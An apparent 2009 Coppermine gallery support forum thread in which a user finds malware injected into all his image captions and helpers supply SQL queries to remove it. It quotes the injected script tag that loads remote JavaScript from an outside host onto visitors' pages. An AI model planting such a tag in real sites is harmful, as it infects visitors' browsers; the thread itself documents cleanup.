Advanced search  

News:

cpg1.5.28 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.26 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: [Solved]: Avast warning about HTML:Script-inf  (Read 34027 times)

0 Members and 1 Guest are viewing this topic.

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
[Solved]: Avast warning about HTML:Script-inf
« on: March 27, 2009, 01:43:01 AM »

Hello and thank you for a great product.

A couple of days ago I was struck with malware on my coppermine site.
So I started to google for answers and found this that I followed
http://forum.coppermine-gallery.net/index.php/topic,51671.0/prev_next,next.html#new

So I thought I had cleaned the site using winmerge and the guide plus upgrading to latest version (Coppermine Photo Gallery 1.4.21 (stable)).
Then I got reports that it still was infected with a malware called HTML:Script-inf.
I could not believe this because it was/is squeaky clean. Only unique files are those explained in the link, plus my album stuff (jpg and flash files).
So I downloaded avast and updated to latest version. And found some evil code

(attached file)
This is the interesting part
<!-- BEGIN caption -->
                                <tr>
                                        <td class="tableb"><center>
                                                <script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>
                                        </center></td>
                                </tr>
<!-- END caption -->

Problem is that I can not find this code on my site (searched every file on site for this text without luck). This is generated some how from what I do not know.

Link to the infected part:
http://www.fanvadnajs.se/coppermine/displayimage.php?album=108&pos=0

Any assistance would be appreciated.
« Last Edit: March 27, 2009, 09:56:26 PM by Joachim Müller »
Logged

Nibbler

  • Guest
Re: Avast warning about HTML:Script-inf
« Reply #1 on: March 27, 2009, 04:44:30 AM »

That code has been set as the caption for all your files (so it's in the database not a file). You'll need to set new captions for all your files.
Logged

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: Avast warning about HTML:Script-inf
« Reply #2 on: March 27, 2009, 08:54:57 AM »

Thank you so much  ;D
I opened my phpmyadmin and did a search on the adress
I found the following
6027 match(es) inside table cpg149_pictures

Now I have a couple of questions.
1.   How do I clean this? Im no expert in myphpadmin, but I guess that I could individually remove each line of code 6027 times. Im guessing there is a faster way.
2.   Do any one know how this happen. Yes this is lack of security, but where? Do I need to tell my host to upgrade software or is the fault mine?
This probably happened when I had the older version of coppermine, but now it´s upgraded.
3.   How do I stop this from happening again? Any tip would be welcome.

I have included two files to assist you in your anwsers.
The exported cpg149_pictures database and myphpinfo from coppermine.

And thank you again.
Logged

Nibbler

  • Guest
Re: Avast warning about HTML:Script-inf
« Reply #3 on: March 27, 2009, 02:47:42 PM »

Run this query in phpmyadmin to clean the captions:

Code: [Select]
UPDATE cpg149_pictures SET caption = ''
Logged

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: Avast warning about HTML:Script-inf
« Reply #4 on: March 27, 2009, 04:09:48 PM »

If ill run
UPDATE cpg149_pictures SET caption = ''
Don´t that remove all the comments also? I  just want to remove the bad code.

Thank you for the help again.
Logged

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: Avast warning about HTML:Script-inf
« Reply #5 on: March 27, 2009, 04:40:27 PM »

Asked a friend that knows msql
He gave me this code to run

UPDATE cpg149_pictures SET caption = '' WHERE caption like '%<script src=http://cgi35.plala.or.jp/BTO/data/entry/css.js></script>%'

That worked like a charm   :) :D ;D Removed all unwanted code but not the comments that I wanted to keep.

So now to question 2 and 3? Any ideas?

I just want everything to be up to specs. And for all other people that will or has the same problem.

Thank you for all your help, im impressed by the speed I recived help.
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47844
  • aka "GauGau"
    • gaugau.de
Re: Avast warning about HTML:Script-inf
« Reply #6 on: March 27, 2009, 09:56:15 PM »

The fields "caption" and comments posted on a file (residing in another table) are different animals.
Logged

redbjork

  • Coppermine newbie
  • Offline Offline
  • Posts: 13
Re: [Solved]: Avast warning about HTML:Script-inf
« Reply #7 on: March 27, 2009, 10:12:24 PM »

Ah ok, well I was unshure, so I guess both of the queries would have worked then. ::)
Logged
Pages: [1]   Go Up
 

Page created in 0.07 seconds with 20 queries.